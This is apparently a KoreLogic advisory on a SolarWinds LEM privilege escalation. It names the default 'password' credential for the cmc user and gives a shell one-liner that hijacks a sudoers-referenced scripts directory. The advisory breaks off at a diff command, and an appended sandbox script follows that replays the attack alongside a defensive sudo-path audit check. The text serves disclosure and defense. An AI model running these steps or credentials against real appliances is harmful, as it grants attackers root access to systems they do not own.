KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path

Title: Solarwinds LEM Privilege Escalation via Controlled Sudo Path
Advisory ID: KL-001-2017-005
Publication Date: 2017.04.24
Publication URL: http://ift.tt/2pbcl6B

1. Vulnerability Details

     Affected Vendor: Solarwinds
     Affected Product: Log and Event Manager Virtual Appliance
     Affected Version: v6.3.1
     Platform: Embedded Linux
     CWE Classification: CWE-281: Improper Preservation of Permissions,
                         CWE-708: Incorrect Ownership Assignment
     Impact: Privileged Access
     Attack vector: SSH

2. Vulnerability Description

     Because of lax filesystem permissions, an attacker can take control of
     a path that is hardcoded in the sudoers file and thereby execute
     commands as a privileged user.

3. Technical Description

     An attacker who can log in over SSH as the cmc user can obtain root
     access to the underlying operating system. The default password for
     the cmc user is "password".

     Because of the permissions on the underlying filesystem, the cmc user
     can take control of a path that is hardcoded in the sudoers file. The
     attack begins by renaming the scripts directory, creating a new
     scripts directory that the attacker owns, and populating it with
     symlinks to the original files, so that every path under scripts/
     that sudoers references still resolves to the real script.

     cmc@swi-lem:/usr/local/contego$ mv scripts scripts.real && mkdir scripts && cd scripts.real && for A in * ; do ln -s ../scripts.real/${A} ../scripts/${A} ; done

     Next, one of the scripts named in the sudoers file is overwritten
     with an attacker-controlled version (the attacker owns the new
     scripts directory, so the symlink can simply be replaced) and is
     then executed through sudo.

     cmc@swi-lem:/usr/local/contego/scripts$ diff -u hostname.sh hostname.sh.backdoor
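The following script is an added example and is not part of the KoreLogic advisory or of the Solarwinds appliance. It rebuilds the move-and-symlink step from section 3 inside a scratch directory, so the effect can be inspected without sudo or an appliance, and it adds an audit check, check_sudo_path, that walks a sudoers command path and fails on the first component a non-root user could control. The general rule it encodes is that a sudoers entry whose command path has a component writable by the invoking user is equivalent to granting that user NOPASSWD: ALL. Everything beyond the directory and file names taken from the advisory is an assumption: the file contents, the 775 mode that stands in for the lax permissions, the replacement hostname.sh (the page does not show the real hostname.sh.backdoor), and the check function itself.

```sh
#!/bin/sh
# Added example for the technique described above. It is not part of the
# KoreLogic advisory and does not run on the appliance: it rebuilds the
# move-and-symlink step inside a scratch directory (no sudo needed) and
# adds a small audit check, check_sudo_path, that walks a sudoers command
# path and fails on the first component a non-root user could control.
# Directory and file names mirror the advisory; file contents, the 775
# mode standing in for the lax permissions, and the replacement script
# are all constructed for illustration.
set -eu

# Build a stand-in for /usr/local/contego/scripts with one sudo target.
# $2 is the mode of the contego directory: 755 models a hardened install,
# 775 models the group-writable directory the attack relies on.
setup_tree() {
    base=$1; contego_mode=$2
    mkdir -p "$base/contego/scripts"
    printf '#!/bin/sh\necho real-hostname\n' > "$base/contego/scripts/hostname.sh"
    chmod 755 "$base" "$base/contego/scripts" "$base/contego/scripts/hostname.sh"
    chmod "$contego_mode" "$base/contego"
}

# Step 1 from the advisory: rename the real directory, create a new one the
# attacker owns, and symlink every original file into it so that every
# hardcoded path under scripts/ still resolves to the real script.
swap_scripts_dir() {
    base=$1
    (
        cd "$base/contego"
        mv scripts scripts.real
        mkdir scripts
        cd scripts.real
        for A in *; do ln -s "../scripts.real/$A" "../scripts/$A"; done
    )
}

# Step 2: replace one sudoers-listed script. The symlink lives in the
# attacker's directory, so it can be unlinked and replaced while
# scripts.real/hostname.sh stays untouched. The payload is constructed;
# the advisory's own hostname.sh.backdoor is not shown on the page.
backdoor_script() {
    base=$1
    rm "$base/contego/scripts/hostname.sh"
    printf '#!/bin/sh\necho BACKDOORED; id\n' > "$base/contego/scripts/hostname.sh"
    chmod 755 "$base/contego/scripts/hostname.sh"
}

# What `sudo .../scripts/hostname.sh` would now run: the command on the
# second line of whatever file the hardcoded path currently resolves to.
resolved_command() {
    sed -n 2p "$1/contego/scripts/hostname.sh"
}

# Audit check. Walk from FILE up to TOP (default /) and return 1, naming the
# culprit on stderr, at the first component that is not owned by OWNER
# (default root) or is group- or world-writable. TOP lets an appliance
# image mounted elsewhere be audited without the mount point being reported.
check_sudo_path() {
    file=$1; top=${2:-/}; owner=${3:-root}
    p=$file
    while :; do
        if [ ! -e "$p" ] && [ ! -L "$p" ]; then
            echo "UNSAFE: $p does not exist (dangling component)" >&2
            return 1
        fi
        # -prune keeps find on the entry itself; symlinks are examined as links.
        bad=$(find "$p" -prune \( ! -user "$owner" -o -perm -020 -o -perm -002 \) -print)
        if [ -n "$bad" ]; then
            echo "UNSAFE: $p is writable by someone other than $owner" >&2
            return 1
        fi
        [ "$p" = "$top" ] && break
        [ "$p" = "/" ] && break
        p=$(dirname "$p")
    done
    return 0
}

# Stand-alone walkthrough: sh this_file.sh demo
demo() {
    me=$(id -un)
    lax=$(mktemp -d)
    setup_tree "$lax" 775
    echo "before attack: $(resolved_command "$lax")"
    check_sudo_path "$lax/contego/scripts/hostname.sh" "$lax" "$me" || true
    swap_scripts_dir "$lax"
    backdoor_script "$lax"
    echo "after attack:  $(resolved_command "$lax")"
    echo "untouched original: $(sed -n 2p "$lax/contego/scripts.real/hostname.sh")"
    rm -rf "$lax"
}
case "${1:-}" in demo) demo ;; esac
```

The check deliberately flags the precondition rather than the attack: on the lax tree it reports the contego directory before anything has been moved, which is the state an auditor would find on the appliance. Run it against each command path in /etc/sudoers and sudoers.d with the default TOP and OWNER; any UNSAFE line is a path the listed user can redirect exactly as section 3 describes.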